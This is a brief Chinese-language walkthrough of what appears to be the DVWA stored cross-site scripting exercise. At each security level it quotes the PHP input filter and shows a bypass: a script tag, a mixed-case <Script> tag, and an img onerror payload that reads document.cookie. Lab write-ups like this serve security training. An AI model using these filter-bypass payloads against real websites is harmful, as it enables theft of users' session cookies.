low
無驗證,Massage直接注入
<script>alert(document.cookie)</script>
medium
查看源碼發現Name只過濾了<scrpit>標籤
$name = str_replace( '<script>', '', $name );
繞過思路:HTML頁面修改Name的最大輸入長度,注入Name,注入script大寫
<input name="txtName" type="text" size="30" maxlength="100">
<Script>alert(document.cookie)</script>
high
查看源碼,可發現Name只用正則過濾了
$name = preg_replace( '/<(.*)s(.*)c(.*)r(.*)i(.*)p(.*)t/i', '', $name );
繞過思路:HTML頁面修改Name的最大輸入長度,注入Name,注入換一種標籤,這裏用img
<img src=1 onerror=alert(document.cookie)>